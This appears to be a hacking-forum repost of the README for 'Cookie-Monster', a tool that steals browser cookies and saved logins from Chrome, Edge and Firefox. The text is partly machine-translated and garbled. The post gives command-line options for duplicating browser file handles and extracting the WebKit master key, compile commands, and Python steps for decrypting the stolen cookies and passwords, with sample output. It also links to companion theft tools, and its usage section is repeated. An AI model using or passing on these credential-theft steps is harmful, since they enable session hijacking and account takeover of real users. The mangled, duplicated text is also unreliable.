taibeihacker
Moderator
通过BOF或EXE窃取Edge,Chrome和Firefox的浏览器饼干! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target.下载了Cookie/登录数据文件后,Python解密脚本可以帮助提取这些秘密! Firefox模块将解析profiles.ini并找到登录位置。引用单独的GitHub回购以进行离线解密。
cookie-monster示例:
饼干- 铬
饼干- 埃奇
饼干- 弗雷福克斯
Cookie-Monster-Chromecookiepid 1337
Cookie-Monster - ChromeLogIndatapid 1337
cookie-monster -edgecookiepid 4444
cookie-monster -edgelogIndatapid 4444
Cookie-Monster选项:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copy the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copy the file to the CWD
- FireFox,寻找profiles.ini并找到key4.db和logins.json文件
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specify the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specify the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specify the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specify the pid to duplicate its handle and file
cookie-monster.exe-all
Cookie Monster Options:
-h, - 赫尔普显示此帮助消息和退出
- 所有运行铬,边缘和Firefox方法
- edge提取边键并下载cookie/登录数据文件到PWD
- 铬提取物chrome键并下载cookie/登录数据文件到PWD
- FireFox定位Firefox键和cookie,不会制作任何一个文件
pip3 install -r unignts.txt base64编码webkit masterkey
python3 base64-encode.py'\ xec \ xfc .'解密chrome/edge cookies文件
python。
结果示例:
-------------------------------------------------
host:github.com
路径: /
Name: dotcom_user
Cookie: Kingofthenops
Expires: 10月28日2024 21:25:22
host: github.com
路径: /
name: user_session
cookie: x123 .
Expires: 11月11日2023 21:25:22解密Chome/Edge密码文件文件
python。
结果示例:
-------------------------------------------------
url: https://test.com/
用户名:测试仪
密码: McTesty解密Firefox Cookie和存储的凭据:
在Windows上编译EXE
gcc。\ cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
cookie webkit master键extractor: https://github.com/mr-un1k0d3r/cookie-graber-bof
无申请下载: https://github.com/fortra/nanodump
解密cookie并登录data: https://github.com/login-securite/donpapi
BOF Usage
用法: cookie-monster [-Chrome || - edge || -Firefox || - chromecookiepid pid || - chromeLogIndatapid pid || - edgecookiepid pid || - EdgelogIndatapid PID]cookie-monster示例:
饼干- 铬
饼干- 埃奇
饼干- 弗雷福克斯
Cookie-Monster-Chromecookiepid 1337
Cookie-Monster - ChromeLogIndatapid 1337
cookie-monster -edgecookiepid 4444
cookie-monster -edgelogIndatapid 4444
Cookie-Monster选项:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copy the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copy the file to the CWD
- FireFox,寻找profiles.ini并找到key4.db和logins.json文件
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specify the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specify the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specify the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specify the pid to duplicate its handle and file
EXE usage
Cookie Monster Example:cookie-monster.exe-all
Cookie Monster Options:
-h, - 赫尔普显示此帮助消息和退出
- 所有运行铬,边缘和Firefox方法
- edge提取边键并下载cookie/登录数据文件到PWD
- 铬提取物chrome键并下载cookie/登录数据文件到PWD
- FireFox定位Firefox键和cookie,不会制作任何一个文件
Decryption Steps
安装要求的副本pip3 install -r unignts.txt base64编码webkit masterkey
python3 base64-encode.py'\ xec \ xfc .'解密chrome/edge cookies文件
python。
结果示例:
-------------------------------------------------
host:github.com
路径: /
Name: dotcom_user
Cookie: Kingofthenops
Expires: 10月28日2024 21:25:22
host: github.com
路径: /
name: user_session
cookie: x123 .
Expires: 11月11日2023 21:25:22解密Chome/Edge密码文件文件
python。
结果示例:
-------------------------------------------------
url: https://test.com/
用户名:测试仪
密码: McTesty解密Firefox Cookie和存储的凭据:
載入中……
github.com
Installation
确保Mingw-W64并在编译之前安装在Linux上。在Windows上编译EXE
gcc。\ cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
TO-DO
更新Decrypt.py py以基于Firepwd的firefox,并添加基于donpapiReferences
的BruteForce模块,该项目无法完成MR-un1的帮助。强烈建议您检查他的课程!cookie webkit master键extractor: https://github.com/mr-un1k0d3r/cookie-graber-bof
无申请下载: https://github.com/fortra/nanodump
解密cookie并登录data: https://github.com/login-securite/donpapi